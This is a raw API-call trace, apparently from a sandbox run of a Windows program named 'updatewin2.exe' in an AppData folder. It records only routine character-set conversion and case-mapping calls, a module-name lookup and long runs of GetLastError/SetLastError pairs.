¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0111.458] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0111.459] GetLastError () returned 0x0 [0111.459] SetLastError (dwErrCode=0x0) [0111.459] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0111.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ韄糰㞅AĀ") returned 256 [0111.459] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ韄糰㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0111.459] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ韄糰㞅AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0111.459] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8b(nz\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0111.459] GetLastError () returned 0x0 [0111.459] SetLastError (dwErrCode=0x0) [0111.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ韄糰㞅AĀ") returned 256 [0111.459] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ韄糰㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0111.459] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ韄糰㞅AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0111.459] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8b(nz\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0111.459] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43acc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe")) returned 0x5f [0111.459] GetLastError () returned 0x0 [0111.459] SetLastError (dwErrCode=0x0) [0111.459] GetLastError () returned 0x0 [0111.459] SetLastError (dwErrCode=0x0) [0111.459] GetLastError () returned 0x0 [0111.460] SetLastError (dwErrCode=0x0) [0111.460] GetLastError () returned 0x0 [0111.460] SetLastError (dwErrCode=0x0) [0111.460] GetLastError () returned 0x0 [0111.460] SetLastError (dwErrCode=0x0) [0111.460] GetLastError () returned 0x0 [0111.460] SetLastError (dwErrCode=0x0) [0111.460] GetLastError () returned 0x0 [0111.460] SetLastError (dwErrCode=0x0) [0111.460] GetLastError () returned 0x0 [0111.460] SetLastError (dwErrCode=0x0) [0111.460] GetLastError () returned 0x0 [0111.460] SetLastError (dwErrCode=0x0) [0111.460] GetLastError () returned 0x0 [0111.460] SetLastError (dwErrCode=0x0) [0111.460] GetLastError () returned 0x0 [0111.460] SetLastError (dwErrCode=0x0) [0111.460] GetLastError () returned 0x0 [0111.461] SetLastError (dwErrCode=0x0) [0111.461] GetLastError () returned 0x0 [0111.461] SetLastError (dwErrCode=0x0) [0111.461] GetLastError () returned 0x0 [0111.461] SetLastError (dwErrCode=0x0) [0111.461] GetLastError () returned 0x0 [0111.461] SetLastError (dwErrCode=0x0) [0111.461] GetLastError () returned 0x0 [0111.461] SetLastError (dwErrCode=0x0) [0111.461] GetLastError () returned 0x0 [0111.461] SetLastError (dwErrCode=0x0) [0111.462] GetLastError () returned 0x0 [0111.462] SetLastError (dwErrCode=0x0) [0111.462] GetLastError () returned 0x0 [0111.462] SetLastError (dwErrCode=0x0) [0111.462] GetLastError () returned 0x0 [0111.462] SetLastError (dwErrCode=0x0) [0111.462] GetLastError () returned 0x0 [0111.462] SetLastError (dwErrCode=0x0) [0111.462] GetLastError () returned 0x0 [0111.462] SetLastError (dwErrCode=0x0) [0111.462] GetLastError () returned 0x0 [0111.462] SetLastError (dwErrCode=0x0) [0111.462] GetLastError () returned 0x0 [0111.463] SetLastError (dwErrCode=0x0) [0111.463] GetLastError () returned 0x0 [0111.463] SetLastError (dwErrCode=0x0) [0111.463] GetLastError () returned 0x0 [0111.463] SetLastError (dwErrCode=0x0) [0111.463] GetLastError () returned 0x0 [0111.463] SetLastError (dwErrCode=0x0) [0111.463] GetLastError () returned 0x0 [0111.463] SetLastError (dwErrCode=0x0) [0111.463] GetLastError () returned 0x0 [0111.463] SetLastError (dwErrCode=0x0) [0111.463] GetLastError () returned 0x0 [0111.463] SetLastError (dwErrCode=0x0) [0111.463] GetLastError () returned 0x0 [0111.464] SetLastError (dwErrCode=0x0) [0111.464] GetLastError () returned 0x0 [0111.464] SetLastError (dwErrCode=0x0) [0111.464] GetLastError () returned 0x0 [0111.464] SetLastError (dwErrCode=0x0) [0111.464] GetLastError () returned 0x0 [0111.464] SetLastError (dwErrCode=0x0) [0111.464] GetLastError () returned 0x0 [0111.464] SetLastError (dwErrCode=0x0) [0111.464] GetLastError () returned 0x0 [0111.464] SetLastError (dwErrCode=0x0) [0111.464] GetLastError () returned 0x0 [0111.464] SetLastError (dwErrCode=0x0) [0111.464] GetLastError () returned 0x0 [0111.465] SetLastError (dwErrCode=0x0) [0111.465] GetLastError () returned 0x0 [0111.465] SetLastError (dwErrCode=0x0) [0111.465] GetLastError () returned 0x0 [0111.465] SetLastError (dwErrCode=0x0) [0111.465] GetLastError () returned 0x0 [0111.465] SetLastError (dwErrCode=0x0) [0111.465] GetLastError () returned 0x0 [0111.465] SetLastError (dwErrCode=0x0) [0111.465] GetLastError () returned 0x0 [0111.465] SetLastError (dwErrCode=0x0) [0111.465] GetLastError () returned 0x0 [0111.465] SetLastError (dwErrCode=0x0) [0111.465] GetLastError () returned 0x0 [0111.465] SetLastError (dwErrCode=0x0) [0111.466] GetLastError () returned 0x0 [0111.466] SetLastError (dwErrCode=0x0) [0111.466] GetLastError () returned 0x0 [0111.466] SetLastError (dwErrCode=0x0) [0111.466] GetLastError () returned 0x0 [0111.466] SetLastError (dwErrCode=0x0) [0111.466] GetLastError () returned 0x0 [0111.466] SetLastError (dwErrCode=0x0) [0111.466] GetLastError () returned 0x0 [0111.466] SetLastError (dwErrCode=0x0) [0111.466] GetLastError () returned 0x0 [0111.466] SetLastError (dwErrCode=0x0) [0111.466] GetLastError () returned 0x0 [0111.466] SetLastError (dwErrCode=0x0) [0111.466] GetLastError () returned 0x0 [0111.466] SetLastError (dwErrCode=0x0) [0111.466] GetLastError () returned 0x0 [0111.466] SetLastError (dwErrCode=0x0) [0111.467] GetLastError () returned 0x0 [0111.467] SetLastError (dwErrCode=0x0) [0111.467] GetLastError () returned 0x0 [0111.467] SetLastError (dwErrCode=0x0) [0111.467] GetLastError () returned 0x0 [0111.467] SetLastError (dwErrCode=0x0) [0111.467] GetLastError () returned 0x0 [0111.467] SetLastError (dwErrCode=0x0) [0111.467] GetLastError () returned 0x0 [0111.467] SetLastError (dwErrCode=0x0) [0111.467] GetLastError () returned 0x0 [0111.467] SetLastError (dwErrCode=0x0) [0111.467] GetLastError () returned 0x0 [0111.467] SetLastError (dwErrCode=0x0) [0111.467] GetLastError () returned 0x0 [0111.467] SetLastError (dwErrCode=0x0) [0111.467] GetLastError () returned 0x0 [0111.467] SetLastError (dwErrCode=0x0) [0111.467] GetLastError () returned 0x0 [0111.468] SetLastError (dwErrCode=0x0) [0111.468] GetLastError () returned 0x0 [0111.468] SetLastError (dwErrCode=0x0) [0111.468] GetLastError () returned 0x0 [0111.468] SetLastError (dwErrCode=0x0) [0111.468] GetLastError () returned 0x0 [0111.468] SetLastError (dwErrCode=0x0) [0111.468] GetLastError () returned 0x0 [0111.468] SetLastError (dwErrCode=0x0) [0111.468] GetLastError () returned 0x0 [0111.468] SetLastError (dwErrCode=0x0) [0111.468] GetLastError () returned 0x0 [0111.468] SetLastError (dwErrCode=0x0) [0111.468] GetLastError () returned 0x0 [0111.468] SetLastError (dwErrCode=0x0) [0111.468] GetLastError () returned 0x0 [0111.468] SetLastError (dwErrCode=0x0) [0111.468] GetLastError () returned 0x0 [0111.468] SetLastError (dwErrCode=0x0) [0111.468] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.538] GetLastError () returned 0x0 [0111.538] SetLastError (dwErrCode=0x0) [0111.538] GetLastError () returned 0x0 [0111.539] SetLastError (dwErrCode=0x0) [0111.539] GetLastError () returned 0x0 [0111.539] SetLastError (dwErrCode=0x0) [0111.539] GetLastError () returned 0x0 [0111.539] SetLastError (dwErrCode=0x0) [0111.539] GetLastError () returned 0x0 [0111.540] SetLastError (dwErrCode=0x0) [0111.540] GetLastError () returned 0x0 [0111.545] SetLastError (dwErrCode=0x0) [0111.545] GetLastError () returned 0x0 [0111.545] SetLastError (dwErrCode=0x0) [0111.545] GetLastError () returned 0x0 [0111.546] SetLastError (dwErrCode=0x0) [0111.546] GetLastError () returned 0x0 [0111.546] SetLastError (dwErrCode=0x0) [0111.546] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.549] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.551] GetLastError () returned 0x0 [0111.551] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.553] GetLastError () returned 0x0 [0111.553] SetLastError (dwErrCode=0x0) [0111.553] GetLastError () returned 0x0 [0111.553] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.555] SetLastError (dwErrCode=0x0) [0111.555] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x68) returned 0x1f71990 [0111.556] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.558] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.563] SetLastError (dwErrCode=0x0) [0111.563] GetLastError () returned 0x0 [0111.564] SetLastError (dwErrCode=0x0) [0111.564] GetLastError () returned 0x0 [0111.564] SetLastError (dwErrCode=0x0) [0111.564] GetLastError () returned 0x0 [0111.564] SetLastError (dwErrCode=0x0) [0111.564] GetLastError () returned 0x0 [0111.565] SetLastError (dwErrCode=0x0) [0111.565] GetLastError () returned 0x0 [0111.565] SetLastError (dwErrCode=0x0) [0111.565] GetLastError () returned 0x0 [0111.565] SetLastError (dwErrCode=0x0) [0111.565] GetLastError () returned 0x0 [0111.565] SetLastError (dwErrCode=0x0) [0111.565] GetLastError () returned 0x0 [0111.565] SetLastError (dwErrCode=0x0) [0111.565] GetLastError () returned 0x0 [0111.565] SetLastError (dwErrCode=0x0) [0111.565] GetLastError () returned 0x0 [0111.565] SetLastError (dwErrCode=0x0) [0111.565] GetLastError () returned 0x0 [0111.565] SetLastError (dwErrCode=0x0) [0111.565] GetLastError () returned 0x0 [0111.565] SetLastError (dwErrCode=0x0) [0111.565] GetLastError () returned 0x0 [0111.566] SetLastError (dwErrCode=0x0) [0111.566] GetLastError () returned 0x0 [0111.566] SetLastError (dwErrCode=0x0) [0111.566] GetLastError () returned 0x0 [0111.566] SetLastError (dwErrCode=0x0) [0111.566] GetLastError () returned 0x0 [0111.566] SetLastError (dwErrCode=0x0) [0111.566] GetLastError () returned 0x0 [0111.566] SetLastError (dwErrCode=0x0) [0111.566] GetLastError () returned 0x0 [0111.566] SetLastError (dwErrCode=0x0) [0111.566] GetLastError () returned 0x0 [0111.566] SetLastError (dwErrCode=0x0) [0111.566] GetLastError () returned 0x0 [0111.566] SetLastError (dwErrCode=0x0) [0111.566] GetLastError () returned 0x0 [0111.566] SetLastError (dwErrCode=0x0) [0111.567] GetLastError () returned 0x0 [0111.567] SetLastError (dwErrCode=0x0) [0111.567] GetLastError () returned 0x0 [0111.567] SetLastError (dwErrCode=0x0) [0111.567] GetLastError () returned 0x0 [0111.567] SetLastError (dwErrCode=0x0) [0111.567] GetLastError () returned 0x0 [0111.567] SetLastError (dwErrCode=0x0) [0111.567] GetLastError () returned 0x0 [0111.567] SetLastError (dwErrCode=0x0) [0111.567] GetLastError () returned 0x0 [0111.567] SetLastError (dwErrCode=0x0) [0111.567] GetLastError () returned 0x0 [0111.567] SetLastError (dwErrCode=0x0) [0111.567] GetLastError () returned 0x0 [0111.567] SetLastError (dwErrCode=0x0) [0111.567] GetLastError () returned 0x0 [0111.568] SetLastError (dwErrCode=0x0) [0111.568] GetLastError () returned 0x0 [0111.568] SetLastError (dwErrCode=0x0) [0111.568] GetLastError () returned 0x0 [0111.568] SetLastError (dwErrCode=0x0) [0111.568] GetLastError () returned 0x0 [0111.568] SetLastError (dwErrCode=0x0) [0111.568] GetLastError () returned 0x0 [0111.568] SetLastError (dwErrCode=0x0) [0111.568] GetLastError () returned 0x0 [0111.568] SetLastError (dwErrCode=0x0) [0111.568] GetLastError () returned 0x0 [0111.568] SetLastError (dwErrCode=0x0) [0111.568] GetLastError () returned 0x0 [0111.568] SetLastError (dwErrCode=0x0) [0111.568] GetLastError () returned 0x0 [0111.568] SetLastError (dwErrCode=0x0) [0111.568] GetLastError () returned 0x0 [0111.569] SetLastError (dwErrCode=0x0) [0111.569] GetLastError () returned 0x0 [0111.569] SetLastError (dwErrCode=0x0) [0111.569] GetLastError () returned 0x0 [0111.569] SetLastError (dwErrCode=0x0) [0111.569] GetLastError () returned 0x0 [0111.569] SetLastError (dwErrCode=0x0) [0111.569] GetLastError () returned 0x0 [0111.569] SetLastError (dwErrCode=0x0) [0111.569] GetLastError () returned 0x0 [0111.569] SetLastError (dwErrCode=0x0) [0111.569] GetLastError () returned 0x0 [0111.569] SetLastError (dwErrCode=0x0) [0111.569] GetLastError () returned 0x0 [0111.569] SetLastError (dwErrCode=0x0) [0111.570] GetLastError () returned 0x0 [0111.570] SetLastError (dwErrCode=0x0) [0111.570] GetLastError () returned 0x0 [0111.570] SetLastError (dwErrCode=0x0) [0111.570] GetLastError () returned 0x0 [0111.570] SetLastError (dwErrCode=0x0) [0111.570] GetLastError () returned 0x0 [0111.570] SetLastError (dwErrCode=0x0) [0111.570] GetLastError () returned 0x0 [0111.570] SetLastError (dwErrCode=0x0) [0111.570] GetLastError () returned 0x0 